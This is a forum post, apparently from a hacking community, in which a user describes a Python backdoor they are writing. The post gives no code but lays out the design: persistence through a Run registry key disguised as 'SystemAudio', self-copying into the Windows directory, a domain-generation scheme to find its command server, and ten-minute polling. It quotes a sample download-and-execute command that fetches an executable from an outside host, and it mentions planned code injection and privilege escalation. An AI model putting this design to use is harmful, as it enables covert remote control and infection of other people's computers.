Python Trojan/backdoor

Discussions on past, current and future HTS lectures and related topics here!

Python Trojan/backdoor

Post by swtd on Tue Nov 19, 2019 5:30 am
([msg=99678]see Python Trojan/backdoor[/msg])

A backdoor made in Python! It's still a work in progress but I thought I may post it hear and hear what you guys think. The code is straight forward and shouldn't be hard to understand. How it works: First it will look after a winreg entry to see if has been run before on the system, this winreg is will be found at" Local Machine Software\Microsoft\Windows\CurrentVersion\Run" under the name SystemAudio. If it is found then it jumps to check if it can find a valid CC to connect to. And if haven't ran before it creates the entry and copy itself to the windows directory, and then tries to find a valid domain. This is done by generating domains based on weeknr and year + a keyword. If the backdoor has ran before it will also try to lookup a winreg found at Local Machine "Software\Microsoft\Windows" where a valid domain will be stored. It then tries to find and connect to a valid domain. If it manages to connect to a domain it will search for a keyword on the page to see if the domain is valid, if it can't find it it will move on and check the next domain. If a valid domain is found it saves to the winreg mentioned before. It will now look if there is a command on the CC, there is only one command so far and thats download and execute. The command layout looks like this DownloadAndExecute=http://h1.ripway.com/ctrltest/putty.exe=putty.exe=2 It will download the file mentioned in the url and spawn it in a new process. It will then sleep for 10min before it contacts the CC to look for a new command. To stop it executing the same command twice the commands is given a ID. Thats about it. More things I'm working on is a dll/code inject and a admin rights hack in some sort of way to make it work on Vista/Win7.

Any further info : rulenation@mail.com
swtd
New User
New User
 
Posts: 5
Joined: Tue Nov 19, 2019 4:50 am
Blog: View Blog (0)


Return to Lectures

Who is online

Users browsing this forum: No registered users and 0 guests